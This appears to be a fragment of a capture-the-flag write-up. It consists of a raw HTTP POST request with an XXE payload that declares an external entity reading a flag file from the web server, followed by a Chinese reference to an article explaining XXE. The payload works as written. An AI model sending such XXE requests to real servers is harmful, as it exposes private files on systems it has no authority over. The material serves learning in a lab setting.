POST / HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/xml
Content-Length: 145
Connection: close
Cookie: PHPSESSID=aro5qb75jpljgc0kenk2g1ef22
<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///var/www/html/flag.txt" >]>
<message>&xxe;</message>
参考链接
先知社区-一篇文章带你深入理解漏洞之 XXE 漏洞